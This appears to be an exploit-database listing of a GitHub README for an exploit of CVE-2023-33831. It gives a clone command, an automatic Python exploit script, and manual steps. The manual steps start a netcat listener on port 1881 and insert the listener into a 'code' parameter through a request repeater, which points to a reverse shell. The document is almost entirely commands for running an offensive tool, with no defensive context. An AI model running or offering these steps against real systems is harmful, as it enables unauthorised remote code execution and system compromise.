## https://sploitus.com/exploit?id=1CE627FE-EA3F-5518-A5E6-53AF5525F5D0
# exploit_CVE-2023-33831
CVE-2023-33831
### Installation
```bash
git clone https://github.com/btar1gan/exploit_CVE-2023-33831
```
### Usage
```bash
# automatic
cd exploit_CVE-2023-33831/
#set your listener
python3 33831.py
# manual
nc -lvnp 1881
#set your listener on code param
copy the 33831.txt to repeater
```